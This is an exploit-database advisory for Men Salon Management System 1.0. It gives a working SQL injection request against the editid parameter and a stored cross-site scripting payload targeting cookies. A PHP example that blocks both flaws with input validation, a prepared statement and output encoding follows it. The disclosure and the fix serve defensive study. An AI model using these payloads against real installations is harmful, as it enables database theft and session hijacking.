## https://sploitus.com/exploit?id=PACKETSTORM:164124
# Exploit Title: Men Salon Management System 1.0 - Multiple Vulnerabilities  
# Date: 2021-09-09  
# Exploit Author: Aryan Chehreghani  
# Vendor Homepage: https://phpgurukul.com  
# Software Link: https://phpgurukul.com/men-salon-management-system-using-php-and-mysql  
# Version: 1.0  
# Tested on: Windows 10 - XAMPP Server  
  
# Vulnerable page :  
http://localhost/msms/admin/edit-customer-detailed.php?editid=  
  
# Proof Of Concept :  
# 1 . Download and install [ Men Salon Management System ]  
# 2 . Go to /msms/admin/index.php and enter Username & Password  
# 3 . Navigate to >> Customer List   
# 4 . In the action column, click Edit   
# 5 . Enter the payload into the URL and fields  
  
# [ SQL Injection ] :  
  
Vulnerable parameter :  
The editid parameter is vulnerable to SQL injection  
  
GET : http://localhost/msms/admin/edit-customer-detailed.php?editid=2'+union+select+1,database(),3,4,5,6,7,8--+  
  
# [ Stored Cross-Site Scripting ] :   
  
Vulnerable Fields : Name & Email  
  
Payload Used: "><script>alert(document.cookie)</script>
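
A defensive counterpart to the two findings above, as an added example that is not part of the advisory or the vendor's code: it validates `editid` as an integer, binds it in a prepared statement, and HTML-encodes the stored Name and Email values on output. The `customers` table, its columns, the helper names and the in-memory SQLite database (standing in for MySQL) are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical helper: accept editid only if it is a positive integer.
function parse_edit_id(?string $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Hypothetical helper: encode a stored value for HTML text or attribute context.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Hypothetical lookup: the id is bound as a typed parameter, never concatenated.
function find_customer(PDO $db, int $id): ?array
{
    $stmt = $db->prepare('SELECT id, name, email FROM customers WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data; in-memory SQLite stands in for the MySQL database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT, email TEXT)');
$ins = $db->prepare('INSERT INTO customers (id, name, email) VALUES (?, ?, ?)');
$ins->execute([2, '"><script>alert(document.cookie)</script>', 'user@example.test']);

// Inputs: a normal id, and the editid value from the GET request above (URL-decoded).
$inputs = ['2', "2' union select 1,database(),3,4,5,6,7,8-- "];
foreach ($inputs as $raw) {
    $id = parse_edit_id($raw);
    if ($id === null) {
        echo "rejected editid (HTTP 400 in a real handler)\n";
        continue;
    }
    $row = find_customer($db, $id);
    if ($row === null) {
        echo "no such customer\n"; continue;
    }
    // The stored payload is rendered as inert text inside the form field.
    echo '<input name="name" value="' . h($row['name']) . '">' . "\n";
    echo '<input name="email" value="' . h($row['email']) . '">' . "\n";
}
```

Run it from the PHP CLI; it requires the pdo_sqlite extension.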